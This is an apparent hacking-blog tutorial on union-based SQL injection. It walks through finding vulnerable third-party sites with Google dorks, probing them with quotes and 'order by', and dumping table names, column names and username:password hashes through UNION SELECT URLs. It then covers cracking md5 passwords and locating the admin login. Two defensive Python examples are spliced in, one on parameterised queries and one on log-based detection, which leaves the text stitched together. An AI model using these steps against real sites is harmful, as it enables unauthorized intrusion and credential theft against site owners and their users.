SQL INJECTION TUTORIAL BY SEANSTAR "TUTORIAL IN PICTURES" | Ksecurity-team

My Guide to Sql Injection

Yes, I know there are a lot of guides out there for this.. but I'm going to try and add on a little, and maybe make it a bit easier to understand.

First of all, you are going to need a good google dork.

If you don't know what a google dork is.. well.. It's basically a google search query that yields results of sites that you may be able to exploit, etc.

Some examples:

Code:
inurl:post.php?id=
inurl:blog.php?id=
inurl:news.php?id=
inurl:index.php?page_id=

Now, you are going to have to be creative with this.. try different things.. like instead of id= on one, you may put page_id=.. or you can rename the php file to something that you think may yield appropriate results.

Once you do the search, I recommend opening every result on the page in a new tab.. then checking each site for vulnerability.

Step 1:
You can check if a site is vulnerable by placing a ' at the end of the url.

Example:

Code:
http://www.example.com/news.php?id=32'

[Image: page1x.png]

Now, if the site displays an error, or it goes blank, you know that it is at least somewhat vulnerable.. but let's check further.

On the other hand, if the page redirects to another page, or it just doesn't change at all, close the page and try another.

Step 2:
Now to try the order by clause. Erase that ' at the end and replace it with order by 1.

Example:

Code:
http://www.example.com/news.php?id=32 order by 1

If that displays an error/blank page, the site is not vulnerable; if not, continue with this step.

Next try something ridiculous, like order by 9999.

If that displays an error/blank page, the site is good so far; if not, the site is not vulnerable.

Now, the goal is to find the largest number that doesn't display an error/blank page. Once that is found, proceed to the next step.

I usually try going down in tens from 30 like this.
(Let's say the number is 8)

Code:
http://www.example.com/news.php?id=32 order by 30 (Error)
http://www.example.com/news.php?id=32 order by 20 (Error)
http://www.example.com/news.php?id=32 order by 10 (Error)
http://www.example.com/news.php?id=32 order by 5 (Regular)
http://www.example.com/news.php?id=32 order by 7 (Regular)
http://www.example.com/news.php?id=32 order by 8 (Regular)
http://www.example.com/news.php?id=32 order by 9 (Error)

So I found out the number is 8.

NOTE: In some cases, if order by 1 displays an error, you can continue to step 3 and try to guess the number with union select.

Step 3:
Alright, so far the site is looking vulnerable! Time for the finale test.
Erase the order by statement, and insert a - between the equal sign and the number. Then add to the end UNION SELECT *the number from the previous step, counted from 1, separated by commas*.

This is kinda hard to explain in words. To get the idea, here is an example:

Code:
http://www.example.com/news.php?id=-32 UNION SELECT 1,2,3,4,5,6,7,8

[Image: page2yx.png]

Don't forget the dash! (id=-32) rather than (id=32)

Now, if this displays an error/blank page, just move on to the next site.

If it displays a couple of numbers on the page, congrats! The site is vulnerable!
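Why the three checks above behave as they do is easier to see from the server side. This is an added example, not part of the original tutorial: a constructed news table in SQLite, the string-concatenation lookup that news.php-style scripts typically use, and a hardened lookup that validates the parameter and binds it. The table name, column names and function names are assumptions, and SQLite stands in for MySQL so the example runs offline; it reports the same three outcomes (page renders, blank page, error) that the tutorial reads off the browser.

```python
import re
import sqlite3

# Constructed sample table standing in for whatever sits behind news.php (assumption).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    con.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(32, "Release notes", "Version 2 is out"),
         (33, "Maintenance", "Downtime on Sunday")],
    )
    return con

def vulnerable_lookup(con, raw_id):
    """The pattern the tutorial is probing for: the id parameter is pasted
    straight into the SQL text, so anything after the number becomes SQL."""
    sql = "SELECT id, title, body FROM news WHERE id=" + raw_id
    return con.execute(sql).fetchall()

def hardened_lookup(con, raw_id):
    """Validate the parameter's shape, then bind it; the value never becomes SQL text."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, body FROM news WHERE id=?"
    return con.execute(sql, (int(raw_id),)).fetchall()

def probe(lookup, con, raw_id):
    """Classify one request the way the tutorial does from the browser:
    'rows' (page renders), 'empty' (blank page), 'db-error' (SQL error surfaced),
    or 'rejected' (input refused by the application before any query runs)."""
    try:
        rows = lookup(con, raw_id)
    except sqlite3.Error:
        return "db-error"
    except ValueError:
        return "rejected"
    return "rows" if rows else "empty"

if __name__ == "__main__":
    con = make_db()
    for payload in ("32", "32'", "32 order by 3", "32 order by 4",
                    "-32 UNION SELECT 1,2,3", "-32 UNION SELECT 1,2"):
        print(f"{payload!r:32} vulnerable={probe(vulnerable_lookup, con, payload):9} "
              f"hardened={probe(hardened_lookup, con, payload)}")
```

With the concatenating version, `order by 4` errors because the query only has three columns, and `-32 UNION SELECT 1,2,3` returns the literal row (1, 2, 3) because no news row has id -32, which is exactly why the numbers show up on the page in step 3. The hardened version turns every one of those probes into a rejected request before the database sees it; that is the property worth testing for, rather than the absence of an error message.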

Step 4:
Now that you know the site is vulnerable, it's time to inject into one of those numbers. Find a number on the page that you want to use. For this example, let's say I found a 2 on the page. You can use any number you see on the page.

Now to check the version.

Replace the 2 in the number set after UNION SELECT with @@version.

Example:

Code:
http://www.example.com/news.php?id=-32 UNION SELECT 1,@@version,3,4,5,6,7,8

[Image: page3h.png]

Now you will see the version where the 2 was on the page.

If the version is 4, you can either guess the tables or you can skip the site.
(Go to step 6 on how to insert the tables)

If the version is 5, you can grab the tables with a special command.

Step 5:
Alright, with version 5 you need to replace @@version with group_concat(table_name) and add from information_schema.tables where table_schema= database () to the end of the entire url.

Example:

Code:
http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema= database ()

[Image: page4s.png]

This should display all the tables in the database. Find something with users or admin in it.

Now to see the column names contained in that table. So copy the table name you want to get the data from and use a tool like the "HackBar" addon for Firefox to convert it to a MySQL CHAR() string. Let's say the table name is users. I convert that to CHAR(117, 115, 101, 114, 115).

Now edit the group_concat(table_name) to group_concat(column_name), the information_schema.tables to information_schema.columns, and the table_schema= database () to table_name= CHAR(#'s)

#'s = the numbers that were in the string you generated.

Example:

Code:
http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name= CHAR(117, 115, 101, 114, 115)

[Image: page5b.png]

This will display the column names.
Like.. username,password.

Step 6:
Finally, replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

columnname = a column name you found
anothercolumnname = another column name you found.
0x3a = a colon.

And replace the whole from statement with the table that contains those columns

Example:

Code:
http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users

[Image: page6x.png]

And there you go.. that should display the username:password..
If there is one, that is likely the admin username/password.

NOTE: Most of the time, the password is hashed with md5.. just look up an md5 database to check it against, or crack it yourself.
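From the defender's side, every step above leaves a distinctive request in the web server's access log. The following is an added example, not from the original tutorial: a small Python scanner that decodes the query string of each request and flags the signatures of steps 1 to 5 (a quote appended to a numeric id, order by probes, UNION SELECT, @@version, information_schema and group_concat). The log lines are constructed, the parameter names come from the tutorial's own URLs, and the repeat-offender threshold is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (not from the original page).
# Lines 2-5 replay the tutorial's probes against news.php; the rest is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2011:10:01:02 +0000] "GET /news.php?id=32 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:09 +0000] "GET /news.php?id=32%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:01:20 +0000] "GET /news.php?id=32%20order%20by%2030 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:02:01 +0000] "GET /news.php?id=-32%20UNION%20SELECT%201,@@version,3,4,5,6,7,8 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2011:10:02:30 +0000] "GET /news.php?id=-32%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:03:00 +0000] "GET /blog.php?id=7&page=2 HTTP/1.1" 200 6011 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:03:05 +0000] "GET /search.php?q=order%20form HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

# Groups: ip, timestamp, method, request target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each signature corresponds to one step of the tutorial and is matched on the
# decoded parameter value, so URL encoding does not hide it.
SIGNATURES = [
    ("quote appended to numeric id", re.compile(r"^-?\d+\s*'")),
    ("order by column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("version fingerprint", re.compile(r"@@version", re.I)),
    ("information_schema read", re.compile(r"\binformation_schema\.", re.I)),
    ("group_concat extraction", re.compile(r"\bgroup_concat\s*\(", re.I)),
]

def classify_value(value):
    """Return the labels of every signature that matches one decoded parameter value."""
    return [label for label, rx in SIGNATURES if rx.search(value)]

def scan_log(text):
    """Parse each log line, decode its query string and record flagged parameters."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line; a production scanner would count these
        ip, target, status = m.group(1), m.group(4), int(m.group(5))
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append({"line": lineno, "ip": ip, "path": parts.path,
                             "param": name, "status": status, "reasons": reasons})
    return hits

def repeat_offenders(hits, threshold=2):
    """Source IPs with at least `threshold` flagged requests (threshold is an assumption)."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"line {h['line']}: {h['ip']} {h['path']} param={h['param']} "
              f"status={h['status']} -> {', '.join(h['reasons'])}")
    print("repeat offenders:", repeat_offenders(found))
```

Two details matter in practice: the 500 responses on the quote and order by probes are the "error/blank page" the tutorial is looking for, so pairing the signature with the status code separates a scanner that is getting somewhere from one that is not, and the quote signature is anchored to a numeric-looking value so that free-text fields such as search terms do not trip it.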

Step 7:
Now to find where to enter this admin info.

I recommend the admin finder, which can be found here.

[Image: page7a.png]


© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com